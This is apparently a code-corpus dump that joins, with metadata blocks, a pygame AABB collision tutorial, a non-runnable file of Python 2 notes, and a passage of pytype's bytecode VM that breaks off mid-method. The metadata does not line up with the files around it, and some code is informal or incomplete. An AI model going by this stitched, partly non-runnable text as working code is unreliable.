"repo_name": "splunk/splunk-webframework",
"path": "contrib/aaargh/aaargh.py",
"copies": "1",
"size": "5564",
"license": "apache-2.0",
"hash": -5328062065047802000,
"line_mean": 33.5652173913,
"line_max": 78,
"alpha_frac": 0.6035226456,
"autogenerated": false,
"ratio": 4.523577235772358,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00021417862497322766,
"num_lines": 161
} |
# AABB collision example
# KidsCanCode 2016
import pygame as pg
vec = pg.math.Vector2  # alias for pygame's 2D vector type
WIDTH = 800   # window width in pixels
HEIGHT = 600  # window height in pixels
FPS = 60      # frame-rate cap used by clock.tick()
# Colors as RGB(A) tuples; the 4th component is alpha, used for the
# translucent fills of the mouse-following surface.
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0, 128)
GREEN = (0, 255, 0, 128)
CYAN = (0, 255, 255, 128)
YELLOW = (255, 255, 0)
LIGHTGRAY = (150, 150, 150)
DARKGRAY = (40, 40, 40)
def draw_text(text, size, color, x, y, align="nw"):
    """Render `text` at (x, y) on the global `screen`.

    `align` names which point of the text rect is anchored at (x, y):
    a compass point ("nw", "n", "ne", "e", "se", "s", "sw", "w") or
    "center".  Unknown values leave the rect at its default position.
    """
    font_name = pg.font.match_font('hack')
    font = pg.font.Font(font_name, size)
    text_surface = font.render(text, True, color)
    text_rect = text_surface.get_rect()
    # Replaces the original nine-way if chain: map each alignment keyword
    # to the pygame.Rect virtual attribute it anchors, then set it once.
    anchors = {"nw": "topleft", "ne": "topright",
               "sw": "bottomleft", "se": "bottomright",
               "n": "midtop", "s": "midbottom",
               "e": "midright", "w": "midleft",
               "center": "center"}
    if align in anchors:
        setattr(text_rect, anchors[align], (x, y))
    screen.blit(text_surface, text_rect)
# --- Setup: window, clock, the static rect and the mouse-follower. ---
pg.init()
screen = pg.display.set_mode((WIDTH, HEIGHT))
pg.display.set_caption("AABB Collisions")
clock = pg.time.Clock()
p = pg.Rect(0, 0, 150, 150)            # static yellow box
p.center = (WIDTH / 3, HEIGHT / 3)
m_r = pg.Rect(0, 0, 100, 100)          # rect tracking the mouse
m = pg.Surface((100, 100)).convert_alpha()  # translucent fill surface
col = GREEN  # NOTE(review): never reassigned below (all updates are
             # commented out), so the rect caption always renders GREEN.
msg = ""
running = True
while running:
    clock.tick(FPS)
    for event in pg.event.get():
        if event.type == pg.QUIT:
            running = False
        if event.type == pg.KEYDOWN:
            if event.key == pg.K_ESCAPE:
                running = False
    m_r.center = (pg.mouse.get_pos())
    # AABB overlap test, one axis at a time: overlapping on both axes
    # means collision; overlapping on exactly one is shown in cyan.
    in_x = m_r.left < p.right and m_r.right > p.left
    in_y = m_r.top < p.bottom and m_r.bottom > p.top
    if in_x and in_y:
        # col = RED
        m.fill(RED)
        msg = "Colliding!"
    elif in_x or in_y:
        # col = CYAN
        m.fill(CYAN)
        msg = "Not colliding"
    else:
        # col = GREEN
        m.fill(GREEN)
        msg = "Not colliding"
    # Draw guide lines extending the static rect's edges to the borders.
    screen.fill(DARKGRAY)
    pg.draw.line(screen, LIGHTGRAY, (p.left, p.bottom + 5), (p.left, HEIGHT), 2)
    pg.draw.line(screen, LIGHTGRAY, (p.right, p.bottom + 5), (p.right, HEIGHT), 2)
    pg.draw.line(screen, LIGHTGRAY, (p.right + 5, p.top), (WIDTH, p.top), 2)
    pg.draw.line(screen, LIGHTGRAY, (p.right + 5, p.bottom), (WIDTH, p.bottom), 2)
    pg.draw.rect(screen, YELLOW, p)
    # pg.draw.rect(screen, col, m)
    screen.blit(m, m_r)
    draw_text(msg, 22, WHITE, 15, 15)
    draw_text("left", 18, WHITE, p.left - 5, HEIGHT - 5, align="se")
    draw_text("right", 18, WHITE, p.right + 5, HEIGHT - 5, align="sw")
    draw_text("top", 18, WHITE, WIDTH - 5, p.top - 5, align="se")
    draw_text("bottom", 18, WHITE, WIDTH - 5, p.bottom + 5, align="ne")
    draw_text(str(m_r), 20, col, WIDTH / 2, 15, align="nw")
    pg.display.flip()
| {
"repo_name": "kidscancode/gamedev",
"path": "tutorials/examples/aabb example.py",
"copies": "1",
"size": "2898",
"license": "mit",
"hash": 890904721168602800,
"line_mean": 28.8762886598,
"line_max": 82,
"alpha_frac": 0.5600414079,
"autogenerated": false,
"ratio": 2.670967741935484,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.37310091498354836,
"avg_score": null,
"num_lines": null
} |
>>> a = ['a', 'b', 'c', 'd', 'e']
>>> for index, item in enumerate(a): print index, item # the enumerate function yields an (index, item) pair for each item.
...
0 a
1 b
2 c
3 d
4 e
#convert a list to string:
list1 = ['1', '2', '3']
str1 = ''.join(list1)
Or if the list is of integers, convert the elements before joining them.
list1 = [1, 2, 3]
str1 = ''.join(str(e) for e in list1)
#FIND method
str.find(str2, beg=0 end=len(string))
Parameters
str2 -- This specifies the string to be searched.
beg -- This specifies the starting index; by default it is 0.
end -- This specifies the ending index; by default it is equal to the length of the string.
Return Value
This method returns index if found and -1 otherwise.
str1 = "this is string example....wow!!!";
str2 = "exam";
# find function will print the position for the first character of the string if it's found!
print str1.find(str2);
print str1.find(str2, 10);
print str1.find(str2, 40);
#15
#15
#-1
#2D LIST PYTHON
# Creates a list containing 5 lists, each with 5 elements initialized to 0
Matrix = [[0 for x in range(5)] for x in range(5)]
You can now add items to the list:
Matrix[0][0] = 1
Matrix[4][0] = 5
print Matrix[0][0] # prints 1
print Matrix[4][0] # prints 5
if you have a simple two-dimensional list like this:
A = [[1,2,3,4],
[5,6,7,8]]
then you can extract a column like this:
def column(matrix, i):
return [row[i] for row in matrix]
Extracting the second column (index 1):
>>> column(A, 1)
[2, 6]
Or alternatively, simply:
>>> [row[1] for row in A]
[2, 6]
| {
"repo_name": "ujjwalkarn/DataSciencePython",
"path": "basic_commands.py",
"copies": "1",
"size": "1533",
"license": "mit",
"hash": 7758785390209645000,
"line_mean": 17.9259259259,
"line_max": 128,
"alpha_frac": 0.6614481409,
"autogenerated": false,
"ratio": 2.8654205607476637,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40268687016476634,
"avg_score": null,
"num_lines": null
} |
"""A abstract virtual machine for python bytecode that generates typegraphs.
A VM for python byte code that uses pytype/pytd/cfg ("typegraph") to generate a
trace of the program execution.
"""
# We have names like "byte_NOP":
# pylint: disable=invalid-name
# Bytecodes don't always use all their arguments:
# pylint: disable=unused-argument
import collections
import linecache
import logging
import re
import repr as reprlib
import sys
import types
from pytype import abstract
from pytype import blocks
from pytype import exceptions
from pytype import load_pytd
from pytype import state as frame_state
from pytype import utils
from pytype.pyc import loadmarshal
from pytype.pyc import pyc
from pytype.pytd import cfg as typegraph
from pytype.pytd import pytd
from pytype.pytd import slots
from pytype.pytd import utils as pytd_utils
from pytype.pytd.parse import builtins
log = logging.getLogger(__name__)

# Small non-negative int constants up to this bound keep their concrete value
# (e.g. the level argument of IMPORT_NAME); larger ints become abstract.
MAX_IMPORT_DEPTH = 12

# Create a repr that won't overflow.
_TRUNCATE = 120
_TRUNCATE_STR = 72
repr_obj = reprlib.Repr()
repr_obj.maxother = _TRUNCATE
repr_obj.maxstring = _TRUNCATE_STR
# Shorthand: a repr() that truncates long output (used in log messages).
repper = repr_obj.repr

# One entry on a frame's block stack (loops, try/except handlers, etc.).
Block = collections.namedtuple("Block", ["type", "handler", "level"])
class ConversionError(ValueError):
  """Raised when a Variable or constant can't be converted to a Python value."""
  pass
class RecursionException(Exception):
  """Raised to abort analysis of a block that recurses too deeply."""
  pass
def _get_atomic_value(variable):
values = variable.values
if len(values) == 1:
return values[0].data
else:
raise ConversionError(
"Variable with too many options when trying to get atomic value. %s %s"
% (variable, [a.data for a in values]))
def _get_atomic_python_constant(variable):
  """Get the concrete atomic Python value stored in this variable.

  This is used for things that are stored in typegraph.Variable, but we
  need the actual data in order to proceed, e.g. function / class
  definitions.

  Args:
    variable: A typegraph.Variable. It can only have one possible value.

  Returns:
    A Python constant. (Typically, a string, a tuple, or a code object.)

  Raises:
    ConversionError: If the value is ambiguous or purely abstract, i.e.
      doesn't store a Python value.
  """
  atomic = _get_atomic_value(variable)
  if not isinstance(atomic, abstract.PythonConstant):
    raise ConversionError("Only some types are supported: %r" % type(atomic))
  return atomic.pyval
class VirtualMachineError(Exception):
  """For raising errors in the operation of the VM."""
  # e.g. raised by run_instruction when an opcode has no handler.
  pass
class VirtualMachine(object):
"""A bytecode VM that generates a typegraph as it executes.
Attributes:
program: The typegraph.Program used to build the typegraph.
root_cfg_node: The root CFG node that contains the definitions of builtins.
primitive_classes: A mapping from primitive python types to their abstract
types.
"""
  def __init__(self, python_version,
               module_name=None,
               reverse_operators=False,
               cache_unknowns=True,
               pythonpath=(),
               find_pytd_import_ext=".pytd",
               import_drop_prefixes=(),
               pybuiltins_filename=None,
               skip_repeat_calls=True):
    """Construct a TypegraphVirtualMachine.

    Args:
      python_version: The (major, minor) Python version being analyzed.
      module_name: Base module name, forwarded to the pytd loader.
      reverse_operators: Whether reversed ("__r*__") operators are enabled.
        (Only stored here; presumably consumed by bytecode handlers --
        confirm in the rest of the file.)
      cache_unknowns: If true, reuse a single Unknown per program point
        (see _create_new_unknown_value).
      pythonpath: Search path for dependency .pytd files.
      find_pytd_import_ext: Filename extension used when resolving imports.
      import_drop_prefixes: Module-name prefixes stripped during import.
      pybuiltins_filename: Optional builtins source file.  (Only stored
        here; consumer not visible in this chunk -- confirm.)
      skip_repeat_calls: Whether repeated identical calls may be skipped.
        (Only stored here; consumer not visible in this chunk -- confirm.)
    """
    self.python_version = python_version
    self.pybuiltins_filename = pybuiltins_filename
    self.reverse_operators = reverse_operators
    self.cache_unknowns = cache_unknowns
    self.loader = load_pytd.Loader(base_module=module_name,
                                   python_version=python_version,
                                   pythonpath=pythonpath,
                                   find_pytd_import_ext=find_pytd_import_ext,
                                   import_drop_prefixes=import_drop_prefixes)
    self.skip_repeat_calls = skip_repeat_calls
    # The call stack of frames.
    self.frames = []
    # The current frame.
    self.frame = None
    self.return_value = None
    self.program = typegraph.Program()
    self.root_cfg_node = self.program.NewCFGNode("root")
    self.program.entrypoint = self.root_cfg_node
    # Memoization cache shared by the convert_* family of methods.
    self._convert_cache = {}
    # Initialize primitive_classes to empty to allow convert_constant to run
    self.primitive_classes = {}
    # Now fill primitive_classes with the real values using convert_constant
    self.primitive_classes = {v: self.convert_constant(v.__name__, v)
                              for v in [int, long, float, str, unicode,
                                        types.NoneType, complex, bool, slice,
                                        types.CodeType]}
    self.none = abstract.AbstractOrConcreteValue(
        None, self.primitive_classes[types.NoneType], self)
    self.true = abstract.AbstractOrConcreteValue(
        True, self.primitive_classes[bool], self)
    self.false = abstract.AbstractOrConcreteValue(
        False, self.primitive_classes[bool], self)
    self.nothing = abstract.Nothing(self)
    self.unsolvable = abstract.Unsolvable(self)
    # Pre-build one abstract instance per primitive class, keyed by type.
    self.primitive_class_instances = {}
    for name, clsvar in self.primitive_classes.items():
      instance = abstract.Instance(clsvar, self)
      self.primitive_class_instances[name] = instance
      clsval, = clsvar.values
      # Seed the cache with the same key _create_pytd_instance_value uses,
      # so it reuses these instances.
      self._convert_cache[(abstract.Instance, clsval.data.pytd_cls)] = instance
    self.primitive_class_instances[types.NoneType] = self.none
    self.str_type = self.primitive_classes[str]
    self.int_type = self.primitive_classes[int]
    self.tuple_type = self.convert_constant("tuple", tuple)
    self.list_type = self.convert_constant("list", list)
    self.set_type = self.convert_constant("set", set)
    self.dict_type = self.convert_constant("dict", dict)
    self.function_type = self.convert_constant("function type",
                                               types.FunctionType)
    # Name -> definition map for everything the builtins pytd declares.
    self.vmbuiltins = {b.name: b for b in (self.loader.builtins.constants +
                                           self.loader.builtins.classes +
                                           self.loader.builtins.functions)}
  def run_instruction(self, op, state):
    """Run a single bytecode instruction.

    Args:
      op: An opcode, instance of pyc.opcodes.Opcode
      state: An instance of state.FrameState, the state just before running
        this instruction.

    Returns:
      The FrameState right after this instruction, which should roll over to
      the subsequent instruction.  (Note: despite what an older docstring
      said, only the state is returned; the reason an opcode aborts the
      function, if any, is recorded in state.why.)
    """
    if log.isEnabledFor(logging.INFO):
      self.log_opcode(op, state)
    self.frame.current_opcode = op
    try:
      # dispatch
      bytecode_fn = getattr(self, "byte_%s" % op.name, None)
      if bytecode_fn is None:
        raise VirtualMachineError("Unknown opcode: %s" % op.name)
      if op.has_arg():
        state = bytecode_fn(state, op)
      else:
        state = bytecode_fn(state)
    except StopIteration:
      # TODO(kramm): Use abstract types for this.
      state = state.set_exception(
          sys.exc_info()[0], sys.exc_info()[1], None)
      state = state.set_why("exception")
    except RecursionException as e:
      # This is not an error - it just means that the block we're analyzing
      # goes into a recursion, and we're already two levels deep.
      state = state.set_why("recursion")
    except exceptions.ByteCodeException:
      e = sys.exc_info()[1]
      state = state.set_exception(
          e.exception_type, e.create_instance(), None)
      # TODO(pludemann): capture exceptions that are indicative of
      # a bug (AttributeError?)
      log.info("Exception in program: %s: %r",
               e.exception_type.__name__, e.message)
      state = state.set_why("exception")
    if state.why == "reraise":
      state = state.set_why("exception")
    del self.frame.current_opcode
    return state
def join_cfg_nodes(self, nodes):
assert nodes
if len(nodes) == 1:
return nodes[0]
else:
ret = self.program.NewCFGNode()
for node in nodes:
node.ConnectTo(ret)
return ret
  def run_frame(self, frame, node):
    """Run a frame (typically belonging to a method).

    Args:
      frame: The frame to execute.
      node: The CFG node to start from.

    Returns:
      A (cfg_node, return_variable) pair: the joined CFG node of all
      return/yield points (or `node` itself if there are none), and the
      frame's return value variable.
    """
    self.push_frame(frame)
    # Seed the entry state at the first opcode of the code object.
    frame.states[frame.f_code.co_code[0]] = frame_state.FrameState.init(node)
    return_nodes = []
    for block in frame.f_code.order:
      state = frame.states.get(block[0])
      if not state:
        log.error("Skipping block %d,"
                  " we don't have any non-erroneous code that goes here.",
                  block.id)
        continue
      op = None
      for op in block:
        state = self.run_instruction(op, state)
        if state.why:
          # we can't process this block any further
          break
      if state.why in ["return", "yield"]:
        return_nodes.append(state.node)
      if not state.why and op.carry_on_to_next():
        # Fall-through: merge this state into the next opcode's entry state.
        frame.states[op.next] = state.merge_into(frame.states.get(op.next))
    self.pop_frame(frame)
    if not return_nodes:
      # Happens if all the function does is to throw an exception.
      # (E.g. "def f(): raise NoImplemented")
      # TODO(kramm): Return the exceptions, too.
      return node, frame.return_variable
    return self.join_cfg_nodes(return_nodes), frame.return_variable
reversable_operators = set([
"__add__", "__sub__", "__mul__",
"__div__", "__truediv__", "__floordiv__",
"__mod__", "__divmod__", "__pow__",
"__lshift__", "__rshift__", "__and__", "__or__", "__xor__"
])
@staticmethod
def reverse_operator_name(name):
if name in VirtualMachine.reversable_operators:
return "__r" + name[2:]
return None
def push_block(self, state, t, handler=None, level=None):
if level is None:
level = len(state.data_stack)
return state.push_block(Block(t, handler, level))
  def push_frame(self, frame):
    """Push `frame` onto the call stack and make it the current frame."""
    self.frames.append(frame)
    self.frame = frame
def pop_frame(self, frame):
popped_frame = self.frames.pop()
assert popped_frame == frame
if self.frames:
self.frame = self.frames[-1]
else:
self.frame = None
  def print_frames(self):
    """Print the call stack, for debugging."""
    # Mimics the format of a CPython traceback (Python 2 print statements).
    for f in self.frames:
      filename = f.f_code.co_filename
      lineno = f.line_number()
      print ' File "%s", line %d, in %s' % (filename, lineno, f.f_code.co_name)
      # Refresh linecache so we show up-to-date source lines.
      linecache.checkcache(filename)
      line = linecache.getline(filename, lineno, f.f_globals)
      if line:
        print " " + line.strip()
  def unwind_block(self, block, state):
    """Adjusts the data stack to account for removing the passed block."""
    # An except-handler block keeps three extra entries (traceback, value,
    # exctype) on the stack; leave room for them while discarding the rest.
    if block.type == "except-handler":
      offset = 3
    else:
      offset = 0
    while len(state.data_stack) > block.level + offset:
      state = state.pop_and_discard()
    if block.type == "except-handler":
      # Restore the exception triple the handler block had saved.
      state, (tb, value, exctype) = state.popn(3)
      state = state.set_exception(exctype, value, tb)
    return state
  def log_opcode(self, op, state):
    """Write a multi-line log message, including backtrace and stack."""
    if not log.isEnabledFor(logging.INFO):
      return
    # Indent by call-stack depth so nested frames are visually offset.
    indent = " > " * (len(self.frames) - 1)
    stack_rep = repper(state.data_stack)
    block_stack_rep = repper(state.block_stack)
    # TODO(pludemann): nicer module/file name:
    if self.frame.f_code.co_filename:
      module_name = ".".join(re.sub(
          r"\.py$", "", self.frame.f_code.co_filename).split("/")[-2:])
      name = self.frame.f_code.co_name
      log.info("%s | index: %d, %r, module: %s line: %d",
               indent, op.index, name, module_name, op.line)
    else:
      log.info("%s | index: %d, line: %d",
               indent, op.index, op.line)
    log.info("%s | data_stack: %s", indent, stack_rep)
    log.info("%s | block_stack: %s", indent, block_stack_rep)
    log.info("%s | node: <%d>%s", indent, state.node.id, state.node.name)
    arg = op.pretty_arg if op.has_arg() else ""
    # Note: rebinds `op` to a string for the final log line only.
    op = "%d: %s %s" % (op.index, op.name,
                        utils.maybe_truncate(arg, _TRUNCATE))
    log.info("%s %s", indent, op)
  def repper(self, s):
    """Truncating repr (method-level access to the module's repr_obj)."""
    return repr_obj.repr(s)
# Operators
  def pop_slice_and_obj(self, state, count):
    """Pop a slice from the data stack. Used by slice opcodes (SLICE_0 etc.).

    Args:
      state: The current FrameState.
      count: How many slice bounds are on the stack: 1 means only the start,
        2 only the end, 3 both (end above start); 0 means neither.

    Returns:
      A tuple (state, slice_variable, obj).
    """
    start = 0
    end = None  # we will take this to mean end
    if count == 1:
      state, start = state.pop()
    elif count == 2:
      state, end = state.pop()
    elif count == 3:
      state, end = state.pop()
      state, start = state.pop()
    state, obj = state.pop()
    if end is None:
      # Note that Python only calls __len__ if we have a negative index, not if
      # we omit the index. Since we can't tell whether an index is negative
      # (it might be an abstract integer, or a union type), we just always
      # call __len__.
      state, f = self.load_attr(state, obj, "__len__")
      state, end = self.call_function_with_state(state, f, [], {})
    return state, self.build_slice(state.node, start, end, 1), obj
def store_slice(self, state, count):
state, slice_obj, obj = self.pop_slice_and_obj(state, count)
state, new_value = state.pop()
state, f = self.load_attr(state, obj, "__setitem__")
state, _ = self.call_function_with_state(state, f, [slice_obj, new_value],
{})
return state
def delete_slice(self, state, count):
state, slice_obj, obj = self.pop_slice_and_obj(state, count)
state, f = self.load_attr(state, obj, "__delitem__")
state, _ = self.call_function_with_state(state, f, [slice_obj], {})
return state
def get_slice(self, state, count):
state, slice_obj, obj = self.pop_slice_and_obj(state, count)
state, f = self.load_attr(state, obj, "__getitem__")
state, ret = self.call_function_with_state(state, f, [slice_obj], {})
return state.push(ret)
def do_raise(self, state, exc, cause):
"""Raise an exception. Used by byte_RAISE_VARARGS."""
if exc is None: # reraise
exc_type, val, _ = state.last_exception
if exc_type is None:
return state.set_why("exception")
else:
return state.set_why("reraise")
elif type(exc) == type:
# As in `raise ValueError`
exc_type = exc
val = exc() # Make an instance.
elif isinstance(exc, BaseException):
# As in `raise ValueError('foo')`
exc_type = type(exc)
val = exc
else:
return state
# If you reach this point, you're guaranteed that
# val is a valid exception instance and exc_type is its class.
# Now do a similar thing for the cause, if present.
if cause:
if type(cause) == type:
cause = cause()
elif not isinstance(cause, BaseException):
return state
val.__cause__ = cause
state.set_exception(exc_type, val, val.__traceback__)
return state
# Importing
def join_variables(self, node, name, variables):
"""Create a combined Variable for a list of variables.
This is destructive: It will reuse and overwrite the input variables. The
purpose of this function is to create a final result variable for functions
that return a list of "temporary" variables. (E.g. function calls)
Args:
node: The current CFG node.
name: Name of the new variable.
variables: List of variables.
Returns:
A typegraph.Variable.
"""
if not variables:
return self.program.NewVariable(name) # return empty var
elif len(variables) == 1:
v, = variables
return v
else:
v = self.program.NewVariable(name)
for r in variables:
v.PasteVariable(r, node)
return v
def convert_value_to_string(self, val):
if isinstance(val, abstract.PythonConstant) and isinstance(val.pyval, str):
return val.pyval
raise ConversionError("%s is not a string" % val)
def _get_maybe_abstract_instance(self, data):
"""Get an instance of the same type as the given data, abstract if possible.
Get an abstract instance of primitive data stored as an
AbstractOrConcreteValue. Return any other data as-is. This is used by
create_pytd_instance to discard concrete values that have been kept
around for InterpreterFunction.
Arguments:
data: The data.
Returns:
An instance of the same type as the data, abstract if possible.
"""
if isinstance(data, abstract.AbstractOrConcreteValue):
data_type = type(data.pyval)
if data_type in self.primitive_class_instances:
return self.primitive_class_instances[data_type]
return data
  def create_pytd_instance(self, name, pytype, subst, node, source_sets=None,
                           discard_concrete_values=False):
    """Create an instance of a PyTD type as a typegraph.Variable.

    Because this (unlike create_pytd_instance_value) creates variables, it can
    also handle union types.

    Args:
      name: What to call the resulting variable.
      pytype: A PyTD type to construct an instance of.
      subst: The current type parameters.
      node: The current CFG node.
      source_sets: An iterator over instances of SourceSet (or just tuples).
        Each SourceSet describes a combination of values that were used to
        build the new value (e.g., for a function call, parameter types).
      discard_concrete_values: Whether concrete values should be discarded from
        type parameters.

    Returns:
      A typegraph.Variable.

    Raises:
      ValueError: If we can't resolve a type parameter.
    """
    if not source_sets:
      source_sets = [[]]
    if isinstance(pytype, pytd.AnythingType):
      return self.create_new_unknown(node, "?")
    name = pytype.name if hasattr(pytype, "name") else pytype.__class__.__name__
    var = self.program.NewVariable(name)
    for t in pytd_utils.UnpackUnion(pytype):
      if isinstance(t, pytd.TypeParameter):
        if not subst or t.name not in subst:
          raise ValueError("Can't resolve type parameter %s using %r" % (
              t.name, subst))
        # Copy every possible value of the bound type parameter into the
        # result, once per source set.
        for v in subst[t.name].values:
          for source_set in source_sets:
            var.AddValue(self._get_maybe_abstract_instance(v.data)
                         if discard_concrete_values else v.data,
                         source_set + [v], node)
      elif isinstance(t, pytd.NothingType):
        # "nothing" contributes no values.
        pass
      else:
        value = self._create_pytd_instance_value(name, t, subst, node)
        for source_set in source_sets:
          var.AddValue(value, source_set, node)
    return var
  def _create_pytd_instance_value(self, name, pytype, subst, node):
    """Create an instance of PyTD type.

    This can handle any PyTD type and is used for generating both methods of
    classes (when given a Signature) and instance of classes (when given a
    ClassType).

    Args:
      name: What to call the value.
      pytype: A PyTD type to construct an instance of.
      subst: The current type parameters.
      node: The current CFG node.

    Returns:
      An instance of AtomicAbstractType.

    Raises:
      ValueError: if pytype is not of a known type.
    """
    if isinstance(pytype, pytd.ClassType):
      # This key is also used in __init__
      key = (abstract.Instance, pytype.cls)
      if key not in self._convert_cache:
        if pytype.name == "type":
          # special case: An instantiation of "type" can be anything.
          instance = self._create_new_unknown_value("type")
        else:
          instance = abstract.Instance(
              self.convert_constant(str(pytype), pytype), self)
        log.info("New pytd instance for %s: %r", pytype.cls.name, instance)
        self._convert_cache[key] = instance
      return self._convert_cache[key]
    elif isinstance(pytype, pytd.GenericType):
      assert isinstance(pytype.base_type, pytd.ClassType)
      cls = pytype.base_type.cls
      instance = abstract.Instance(
          self.convert_constant(cls.name, cls), self)
      # Instantiate each formal type parameter with its actual value.
      for formal, actual in zip(cls.template, pytype.parameters):
        p = self.create_pytd_instance(repr(formal), actual, subst, node)
        instance.initialize_type_parameter(node, formal.name, p)
      return instance
    else:
      return self.convert_constant_to_value(name, pytype)
def _create_new_unknown_value(self, action):
if not self.cache_unknowns or not action or not self.frame:
return abstract.Unknown(self)
# We allow only one Unknown at each point in the program, regardless of
# what the call stack is.
key = ("unknown", self.frame.current_opcode, action)
if key not in self._convert_cache:
self._convert_cache[key] = abstract.Unknown(self)
return self._convert_cache[key]
def create_new_unknown(self, node, name, source=None, action=None):
"""Create a new variable containing unknown, originating from this one."""
unknown = self._create_new_unknown_value(action)
v = self.program.NewVariable(name)
val = v.AddValue(unknown, source_set=[source] if source else [], where=node)
unknown.owner = val
self.trace_unknown(unknown.class_name, v)
return v
  def create_new_unsolvable(self, node, name):
    """Create a new variable containing an unsolvable."""
    # self.unsolvable is created once in __init__; just wrap it in a
    # fresh variable.
    return self.unsolvable.to_variable(node, name)
  def convert_constant(self, name, pyval):
    """Convert a constant to a Variable.

    This converts a constant to a typegraph.Variable. Unlike
    convert_constant_to_value, it can handle things that need to be represented
    as a Variable with multiple possible values (i.e., a union type), like
    pytd.Function.

    Args:
      name: The name to give the new variable.
      pyval: The Python constant to convert. Can be a PyTD definition or a
        builtin constant.

    Returns:
      A typegraph.Variable.

    Raises:
      ValueError: if pytype is not of a known type.
    """
    if isinstance(pyval, pytd.UnionType):
      options = [self.convert_constant_to_value(pytd.Print(t), t)
                 for t in pyval.type_list]
      return self.program.NewVariable(name, options, [], self.root_cfg_node)
    elif isinstance(pyval, pytd.NothingType):
      # "nothing" becomes a variable with no possible values.
      return self.program.NewVariable(name, [], [], self.root_cfg_node)
    elif isinstance(pyval, pytd.Constant):
      return self.create_pytd_instance(name, pyval.type, {}, self.root_cfg_node)
    result = self.convert_constant_to_value(name, pyval)
    if result is not None:
      return result.to_variable(self.root_cfg_node, name)
    # There might still be bugs on the abstract interpreter when it returns,
    # e.g. a list of values instead of a list of types:
    assert pyval.__class__ != typegraph.Variable, pyval
    if pyval.__class__ == tuple:
      # TODO(ampere): This does not allow subclasses. Handle namedtuple
      # correctly.
      # This case needs to go at the end because many things are actually also
      # tuples.
      return self.build_tuple(
          self.root_cfg_node,
          (self.maybe_convert_constant("tuple[%d]" % i, v)
           for i, v in enumerate(pyval)))
    raise ValueError(
        "Cannot convert {} to an abstract value".format(pyval.__class__))
  def convert_constant_to_value(self, name, pyval):
    """Memoized wrapper around construct_constant_from_value."""
    # We don't memoize on name, as builtin types like str or list might be
    # reinitialized under different names (e.g. "param 1"), but we want the
    # canonical name and type.
    # We *do* memoize on the type as well, to make sure that e.g. "1.0" and
    # "1" get converted to different constants.
    # Memoization is an optimization, but an important one- mapping constants
    # like "None" to the same AbstractValue greatly simplifies the typegraph
    # structures we're building.
    key = ("constant", pyval, type(pyval))
    if key not in self._convert_cache:
      self._convert_cache[key] = self.construct_constant_from_value(name, pyval)
    return self._convert_cache[key]
  def construct_constant_from_value(self, name, pyval):
    """Create a AtomicAbstractValue that represents a python constant.
    This supports both constant from code constant pools and PyTD constants such
    as classes. This also supports built-in python objects such as int and
    float.
    Args:
      name: The name of this constant. Used for naming its attribute variables.
      pyval: The python or PyTD value to convert.
    Returns:
      A Value that represents the constant, or None if we couldn't convert.
    Raises:
      NotImplementedError: If we don't know how to convert a value.
    """
    # Note: branch order matters below; several of the isinstance checks
    # intentionally shadow later, more general ones.
    if pyval is type:
      return abstract.SimpleAbstractValue(name, self)
    elif isinstance(pyval, str):
      return abstract.AbstractOrConcreteValue(pyval, self.str_type, self)
    elif isinstance(pyval, int) and -1 <= pyval <= MAX_IMPORT_DEPTH:
      # For small integers, preserve the actual value (for things like the
      # level in IMPORT_NAME).
      return abstract.AbstractOrConcreteValue(pyval, self.int_type, self)
    elif pyval.__class__ in self.primitive_classes:
      # Other primitives (float, bool, ...) lose their concrete value and map
      # to a shared instance of their class.
      return self.primitive_class_instances[pyval.__class__]
    elif isinstance(pyval, (loadmarshal.CodeType, blocks.OrderedCode)):
      return abstract.AbstractOrConcreteValue(
          pyval, self.primitive_classes[types.CodeType], self)
    elif pyval.__class__ in [types.FunctionType, types.ModuleType, type]:
      try:
        # TODO(ampere): This will incorrectly handle any object that is named
        # the same as a builtin but is distinct. It will need to be extended to
        # support imports and the like.
        pyclass = self.loader.builtins.Lookup(pyval.__name__)
        return self.convert_constant_to_value(name, pyclass)
      except (KeyError, AttributeError):
        log.debug("Failed to find pytd", exc_info=True)
        raise
    elif isinstance(pyval, pytd.Class):
      return abstract.PyTDClass(name, pyval, self)
    elif isinstance(pyval, pytd.Function):
      f = abstract.PyTDFunction(pyval.name, [abstract.PyTDSignature(sig, self)
                                             for sig in pyval.signatures], self)
      return f
    elif isinstance(pyval, pytd.ExternalType):  # needs to be before ClassType
      assert pyval.cls
      return self.convert_constant_to_value(str(pyval), pyval.cls)
    elif isinstance(pyval, pytd.ClassType):  # needs to be after ExternalType
      assert pyval.cls
      return self.convert_constant_to_value(pyval.name, pyval.cls)
    elif isinstance(pyval, pytd.NothingType):
      return self.nothing
    elif isinstance(pyval, pytd.AnythingType):
      return self._create_new_unknown_value("AnythingType")
    elif isinstance(pyval, pytd.UnionType):
      return abstract.Union([self.convert_constant_to_value(pytd.Print(t), t)
                             for t in pyval.type_list], self)
    elif isinstance(pyval, pytd.TypeParameter):
      return abstract.TypeParameter(pyval.name, self)
    elif isinstance(pyval, pytd.GenericType):
      # TODO(kramm): Remove ParameterizedClass. This should just create a
      # SimpleAbstractValue with type parameters.
      assert isinstance(pyval.base_type, pytd.ClassType)
      # Pair each template parameter of the base class with the concrete
      # parameter value supplied by the GenericType.
      type_parameters = {
          param.name: self.convert_constant_to_value(param.name, value)
          for param, value in zip(pyval.base_type.cls.template,
                                  pyval.parameters)
      }
      cls = self.convert_constant_to_value(pytd.Print(pyval.base_type),
                                           pyval.base_type.cls)
      return abstract.ParameterizedClass(cls, type_parameters, self)
    elif pyval.__class__ is tuple:  # only match raw tuple, not namedtuple/Node
      # NOTE(review): this branch uses convert_constant while the similar
      # tuple branch elsewhere uses maybe_convert_constant — confirm intended.
      return self.tuple_to_value(self.root_cfg_node,
                                 [self.convert_constant("tuple[%d]" % i, item)
                                  for i, item in enumerate(pyval)])
    else:
      raise NotImplementedError("Can't convert constant %s %r" %
                                (type(pyval), pyval))
  def maybe_convert_constant(self, name, pyval):
    """Create a variable that represents a python constant if needed.
    Call self.convert_constant if pyval is not an AtomicAbstractValue, otherwise
    store said value in a variable. This also handles dict values by
    constructing a new abstract value representing it. Dict values are not
    cached.
    Args:
      name: The name to give to the variable.
      pyval: The python value or PyTD value to convert or pass
        through.
    Returns:
      A Variable.
    """
    assert not isinstance(pyval, typegraph.Variable)
    if isinstance(pyval, abstract.AtomicAbstractValue):
